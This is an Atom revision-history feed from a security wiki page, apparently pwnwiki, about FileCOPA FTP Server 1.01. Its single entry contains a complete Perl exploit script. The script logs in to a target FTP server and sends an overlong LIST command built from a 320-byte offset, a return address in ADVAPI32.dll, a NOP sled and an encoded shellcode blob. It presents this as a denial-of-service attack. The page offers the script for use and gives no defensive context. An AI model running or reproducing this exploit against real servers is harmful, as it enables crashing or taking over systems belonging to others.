<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E%2Fen</id>
	<title>FileCOPA FTP Server 1.01 拒絕服務漏洞/en - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E%2Fen"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/en&amp;action=history"/>
	<updated>2026-04-16T20:39:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/en&amp;diff=5857&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==Affected Versions==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FileCOPA_FTP_Server_1.01_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/en&amp;diff=5857&amp;oldid=prev"/>
		<updated>2021-06-24T04:16:44Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==Affected Versions==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==Affected Versions==&lt;br /&gt;
FileCOPA FTP Server 1.01&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
# e-mail: fernando.mengalli@gmail.com&lt;br /&gt;
#&lt;br /&gt;
# Date: 04/06/2021&lt;br /&gt;
#&lt;br /&gt;
# Version Vulnerable: FileCOPA FTP Server 1.01&lt;br /&gt;
#&lt;br /&gt;
# OS Tested: Windows XP PACK 3 Brazilian e Windows 2000&lt;br /&gt;
#&lt;br /&gt;
#  Youtube video: https://youtu.be/A9cEoyY9Bd4&lt;br /&gt;
#&lt;br /&gt;
# badchars \0x00\0x0a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
use Net::FTP;&lt;br /&gt;
use Term::ANSIColor;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$sis=&amp;quot;$^O&amp;quot;;&lt;br /&gt;
print $sis;&lt;br /&gt;
&lt;br /&gt;
if ($sis eq &amp;quot;windows&amp;quot;){&lt;br /&gt;
$cmd=&amp;quot;cls&amp;quot;;&lt;br /&gt;
} else {&lt;br /&gt;
$cmd=&amp;quot;clear&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
system(&amp;quot;$cmd&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
if ((!$ARGV[0]) || (!$ARGV[1])) {&lt;br /&gt;
&lt;br /&gt;
&amp;amp;apresentacao();&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
sub apresentacao {&lt;br /&gt;
&lt;br /&gt;
print q {&lt;br /&gt;
######################################################&lt;br /&gt;
#                                                    #&lt;br /&gt;
# [*] FileCOPA FTP Server 1.01 - Denied of Service   #&lt;br /&gt;
#                                                    #&lt;br /&gt;
# [*] Author: Fernando Mengali                       #&lt;br /&gt;
#                                                    #&lt;br /&gt;
# [+] Modo de uso: perl exploit.pl &amp;lt;IP&amp;gt; &amp;lt;Porta&amp;gt;      #&lt;br /&gt;
#                                                    #&lt;br /&gt;
################# Code Exploit #######################&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     }&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
our $alvo = $ARGV[0];&lt;br /&gt;
our $porta = $ARGV[1];&lt;br /&gt;
&lt;br /&gt;
if (!$ARGV[0] &amp;amp;&amp;amp; !$ARGV[1]) {&lt;br /&gt;
exit;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if($alvo !~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) {&lt;br /&gt;
print color('red bold');&lt;br /&gt;
print &amp;quot; \n\n [-] Por favor, defina o IP alvo! \n\n&amp;quot;;&lt;br /&gt;
color('reset');&lt;br /&gt;
exit;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if($porta &amp;lt; 0 || $porta &amp;gt; 65535) {&lt;br /&gt;
print color('red bold');&lt;br /&gt;
print &amp;quot; \n\n [-] Por favor, defina uma porta de 1 a 65535! \n\n&amp;quot;;&lt;br /&gt;
color('reset');&lt;br /&gt;
exit;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
print color('green bold');&lt;br /&gt;
print &amp;quot;\n\nAlvo definido =&amp;gt;&amp;quot; .$alvo . &amp;quot; \n \n&amp;quot;;&lt;br /&gt;
print &amp;quot;Porta definida =&amp;gt;&amp;quot; .$porta . &amp;quot;\n\n&amp;quot;;&lt;br /&gt;
color('reset');&lt;br /&gt;
&lt;br /&gt;
print color('yellow bold');&lt;br /&gt;
print &amp;quot;[+] Por favor, informe a nome de usuário: &amp;quot;;&lt;br /&gt;
color('reset');&lt;br /&gt;
print color('red bold');&lt;br /&gt;
my $usuario = &amp;lt;stdin&amp;gt;;&lt;br /&gt;
chomp($usuario);&lt;br /&gt;
color('reset');&lt;br /&gt;
&lt;br /&gt;
print color('yellow bold');&lt;br /&gt;
print &amp;quot;[*] Por favor, informe a senha de acesso: &amp;quot;;&lt;br /&gt;
color('reset');&lt;br /&gt;
print color('red bold');&lt;br /&gt;
my $senha = &amp;lt;stdin&amp;gt;;&lt;br /&gt;
chomp($senha);&lt;br /&gt;
color('reset');&lt;br /&gt;
&lt;br /&gt;
my $buf =&lt;br /&gt;
&amp;quot;\xba\x17\x61\x66\xaf\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b\xc9&amp;quot; .&lt;br /&gt;
&amp;quot;\xb1\x60\x31\x55\x12\x83\xed\xfc\x03\x42\x6f\x84\x5a\xb7&amp;quot; .&lt;br /&gt;
&amp;quot;\xa9\xf0\x15\x7b\xd9\xfb\x8f\xf7\x01\x08\x75\xdc\x80\x41&amp;quot; .&lt;br /&gt;
&amp;quot;\xd3\x13\x51\xba\xe7\x11\x4d\x39\x25\x21\xb3\x27\x8b\x30&amp;quot; .&lt;br /&gt;
&amp;quot;\xef\xf1\xac\xbd\x95\xe9\xcf\x1a\x1d\xb9\xe1\xf6\x27\x0b&amp;quot; .&lt;br /&gt;
&amp;quot;\xff\x02\x98\xc0\xf6\xc7\x19\x52\xc4\x94\x18\xdb\x56\x20&amp;quot; .&lt;br /&gt;
&amp;quot;\xb6\x9a\xc4\xb5\xec\xf3\x40\xd4\x19\x17\x6d\x35\x50\x3a&amp;quot; .&lt;br /&gt;
&amp;quot;\x13\xc3\xb3\xf0\x38\x8d\xff\xc5\x05\x55\x33\xe7\xd2\x9e&amp;quot; .&lt;br /&gt;
&amp;quot;\xb6\x8c\x9b\x79\xce\x8f\xd6\x30\x72\x12\x62\x26\x3e\xed&amp;quot; .&lt;br /&gt;
&amp;quot;\xef\xda\x23\x88\x07\x74\xdc\xbe\xe1\xc4\x3e\x91\x8a\x26&amp;quot; .&lt;br /&gt;
&amp;quot;\x3a\x3f\x2b\xf2\xe5\x3a\x18\x0f\xd0\x8d\x7b\xba\xf3\xba&amp;quot; .&lt;br /&gt;
&amp;quot;\x2b\x5b\xa5\x2d\x54\xaa\x88\x68\x4b\xf4\xcc\x24\x68\xc1&amp;quot; .&lt;br /&gt;
&amp;quot;\x19\x22\xf9\x08\xd6\x08\x8f\x4a\xe0\x7d\x67\xc1\x4e\xd8&amp;quot; .&lt;br /&gt;
&amp;quot;\x08\x34\x44\x2b\x6a\x6f\x41\x6d\x53\x26\x73\x9d\xb4\xca&amp;quot; .&lt;br /&gt;
&amp;quot;\x87\xed\xe6\x2d\x8b\x1c\x42\x0e\xb3\x20\xd0\xa1\x48\x97&amp;quot; .&lt;br /&gt;
&amp;quot;\x45\x46\x26\x6b\xe7\x74\x52\xc1\xae\x2d\x8d\x1a\x06\xe0&amp;quot; .&lt;br /&gt;
&amp;quot;\x24\x26\xbe\xfe\x26\xf8\x48\x75\x73\x5d\x6c\x67\xeb\xf4&amp;quot; .&lt;br /&gt;
&amp;quot;\xf4\x08\x91\xf8\x5f\x4a\x3a\xd4\x5c\xd4\x7c\x52\x13\xa5&amp;quot; .&lt;br /&gt;
&amp;quot;\x08\x06\xc9\x8b\x04\x9a\x0f\xe5\xe8\x1f\xef\x28\x3b\xe9&amp;quot; .&lt;br /&gt;
&amp;quot;\x6e\xf9\xee\x7e\xf0\x5c\x5e\x4f\x95\x49\x0f\x83\xf0\x70&amp;quot; .&lt;br /&gt;
&amp;quot;\x09\xf6\x83\xe9\x43\xb8\xe0\x88\x51\x6e\x9c\x5d\x48\x5b&amp;quot; .&lt;br /&gt;
&amp;quot;\x9b\xca\x9a\xf1\x48\xa8\x51\x22\x61\x12\x55\xfe\x10\x16&amp;quot; .&lt;br /&gt;
&amp;quot;\xb5\x42\x42\xff\x15\x14\x3f\x44\x9b\x92\xfc\xd9\x67\xe0&amp;quot; .&lt;br /&gt;
&amp;quot;\x15\xd1\x64\xce\x75\xec\xa3\x08\x03\x61\x4a\x3b\x0e\x5a&amp;quot; .&lt;br /&gt;
&amp;quot;\xb0\x7b\xe6\x2c\xac\xae\x5d\xad\x71\xf5\xb8\xc4\x4f\xd3&amp;quot; .&lt;br /&gt;
&amp;quot;\xf4\x40\x2b\x92\x75\x83\xe3\x0f\x4c\x23\x78\x72\x0f\x22&amp;quot; .&lt;br /&gt;
&amp;quot;\xb9\x10\xa6\x1d\xc9\xcb\xca\xe5\x61\xf8\x5f\x64\x86\x49&amp;quot; .&lt;br /&gt;
&amp;quot;\x5b\xb2\x9e\x75\x30\xc6\x6e\x3c\x9a\x02\xad\x03\x36\x29&amp;quot; .&lt;br /&gt;
&amp;quot;\xaf\x84\x62\x98\x22\xcd\xbf\x7e\xa2\x14\x97\x75\xa2\xc3&amp;quot; .&lt;br /&gt;
&amp;quot;\xab&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
$offset = &amp;quot;\x41&amp;quot;x320;&lt;br /&gt;
$NOPS= &amp;quot;\x90&amp;quot;x3105;&lt;br /&gt;
$JMP = &amp;quot;\xe9\xbf\x2c\xb0\xff&amp;quot;; # jmp para endereco de memória&lt;br /&gt;
$EIP= &amp;quot;\x93\x79\x2e\x7c&amp;quot;; # Aqui o jmp na biblioteca ADVAPI32.dll&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$payload = $offset . $EIP . $NOPS . $JMP . $buf . &amp;quot;\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
print color('cyan');&lt;br /&gt;
print &amp;quot;\n\n[+] Conectando para o servidor &amp;quot; . $alvo . &amp;quot;:&amp;quot; . $porta.&amp;quot;... \n&amp;quot;;&lt;br /&gt;
$ftp = Net::FTP-&amp;gt;new($alvo, Debug =&amp;gt; 0, Port =&amp;gt; $porta) || die&lt;br /&gt;
color('red').&amp;quot;\n[-] Não foi possível conectar. \n&amp;quot;;&lt;br /&gt;
sleep(2);&lt;br /&gt;
print &amp;quot;[+] Conectado!\n&amp;quot;;&lt;br /&gt;
sleep(2);&lt;br /&gt;
$ftp-&amp;gt;login($usuario,$senha) || die color('red').&amp;quot;\n [-] Não pode conectar&lt;br /&gt;
ou você derrubou: $!&amp;quot;;&lt;br /&gt;
print &amp;quot;[+] Autenticando...\n&amp;quot;;&lt;br /&gt;
sleep(2);&lt;br /&gt;
print &amp;quot;[+] Autenticado com sucesso!\n\n&amp;quot;;&lt;br /&gt;
sleep(2);&lt;br /&gt;
print &amp;quot;[*] Sobrecarregando o servidor...\n\n&amp;quot;;&lt;br /&gt;
sleep(2);&lt;br /&gt;
$ftp-&amp;gt;command(&amp;quot;LIST A&amp;quot;, $payload);&lt;br /&gt;
color('reset');&lt;br /&gt;
print color('green bold');&lt;br /&gt;
print &amp;quot;[+] Servidor fora do ar!\n&amp;quot;;&lt;br /&gt;
color('reset');&lt;br /&gt;
exit(0);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>